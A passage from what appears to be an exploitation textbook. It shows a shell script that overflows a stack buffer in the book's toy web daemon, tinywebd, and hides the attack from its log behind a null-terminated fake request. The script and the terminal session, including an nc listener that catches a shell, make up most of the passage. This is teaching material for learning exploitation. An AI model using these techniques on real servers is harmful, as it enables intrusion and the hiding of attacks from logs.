Graphics Programs Reference
In-Depth Information
There's a simple mistake in the tinyweb daemon's source code that allows
the request buffer to be truncated early when it's used for the log file output,
but not when copying into memory. The
recv_line()
function uses
\r\n
as the
delimiter; however, all the other standard string functions use a null byte for
the delimiter. These string functions are used to write to the log file, so by
strategically using both delimiters, the data written to the log can be partially
controlled.
The following exploit script puts a valid-looking request in front of the rest
of the exploit buffer. The NOP sled is shrunk to accommodate the new data.
xtool_tinywebd_stealth.sh
#!/bin/sh
# stealth exploitation tool
if [ -z "$2" ]; then # If argument 2 is blank
echo "Usage: $0 <shellcode file> <target IP>"
exit
fi
FAKEREQUEST="GET / HTTP/1.1\x00"
FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ')
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE))
echo "[Fake Request ($FR_SIZE b)] [NOP ($ALIGNED_SLED_SIZE b)] [shellcode
($SIZE b)] [ret addr ($((4*32)) b)]"
(perl -e "print \"$FAKEREQUEST\" . \"\x90\"x$ALIGNED_SLED_SIZE";
cat $1;
perl -e "print \"$RETADDR\"x32 . \"\r\n\"") | nc -w 1 -v $2 80
This new exploit buffer uses the null byte delimiter to terminate the fake
request camouflage. A null byte won't stop the
recv_line()
function, so the
rest of the exploit buffer is copied to the stack. Since the string functions
used to write to the log use a null byte for termination, the fake request is
logged and the rest of the exploit is hidden. The following output shows this
exploit script in use.
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ nc -l -p 31337 &
[1] 7714
reader@hacking:~/booksrc $ jobs
[1]+ Running nc -l -p 31337 &
reader@hacking:~/booksrc $ ./xtool_tinywebd_steath.sh loopback_shell 127.0.0.1
target IP: 127.0.0.1
shellcode: loopback_shell (83 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (318 b)] [shellcode (83 b)] [ret addr (128 b)]
